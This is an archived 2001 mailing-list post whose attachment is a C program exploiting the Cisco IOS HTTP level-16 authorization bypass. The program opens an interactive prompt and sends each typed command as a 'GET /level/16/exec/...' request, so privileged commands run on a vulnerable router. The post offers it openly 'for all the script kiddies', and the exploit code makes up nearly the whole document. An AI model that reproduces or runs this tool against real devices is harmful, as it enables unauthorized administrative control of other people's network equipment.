Cisco IOS HTTP Exploit (another)
Date: Tue, 3 Jul 2001 12:01:47 -0300
From: =?iso-8859-1?Q?Sarda=F1ons=2C_Eliel?= <Eliel.Sardanons@philips.edu.ar.>
To: "[email protected]" <vuln-dev@securityfocus.com.>,
Subject: Cisco IOS HTTP Exploit (another)
------_=_NextPart_000_01C103D1.151C57C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Hey, this code was done for all the script kiddies and lame populus..=20
Don't use my program.. :) use your browser or your telnet client...
Eliel C. Sarda=F1ons
<eliel.sardanons@philips.edu.ar.>
<<cisco.c>>=20
------_=_NextPart_000_01C103D1.151C57C0
Content-Type: application/octet-stream;
name="cisco.c"
Content-Disposition: attachment;
filename="cisco.c"
/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar.>
* to compile:
* bash# gcc -o cisco cisco.c
*/
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_PORT 80
#define PROMPT "\ncisco$ "
int usage (char *progname) {
printf ("Usage:\n\t%s server\n", progname);
exit(-1);
}
int main (int argc, char *argv[]) {
struct hostent *he;
struct sockaddr_in sin;
int sck, i;
char command[256], buffer[512];
if (argc < 2)
usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("host()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(HTTP_PORT);
sin.sin_addr = *((struct in_addr *)he->h_addr);
while (1) {
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
perror("socket()");
exit(-1);
}
if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
perror ("connect()");
exit(-1);
}
printf (PROMPT);
fgets (command, 256, stdin);
if (strlen(command) == 1)
break;
for (i=0;i<strlen(command);i++) {
if (command[i] == ' ')
command[i] = '/';
}
snprintf (buffer, sizeof(buffer),
"GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command);
write (sck, buffer, strlen(buffer));
memset (buffer, 0, sizeof(buffer));
while ((read (sck, buffer, sizeof(buffer))) != 0) {
if ((strstr(buffer, "CR</A>")) != 0) {
printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
memset (buffer, 0, sizeof(buffer));
break;
} else if ((strstr(buffer, "Unauthorized")) != 0) {
printf ("Server not vulnerable\n");
exit(-1);
} else {
printf ("%s", buffer);
memset (buffer, 0, sizeof(buffer));
}
}
}
printf ("Thanks...\n");
exit(0);
}
------_=_NextPart_000_01C103D1.151C57C0--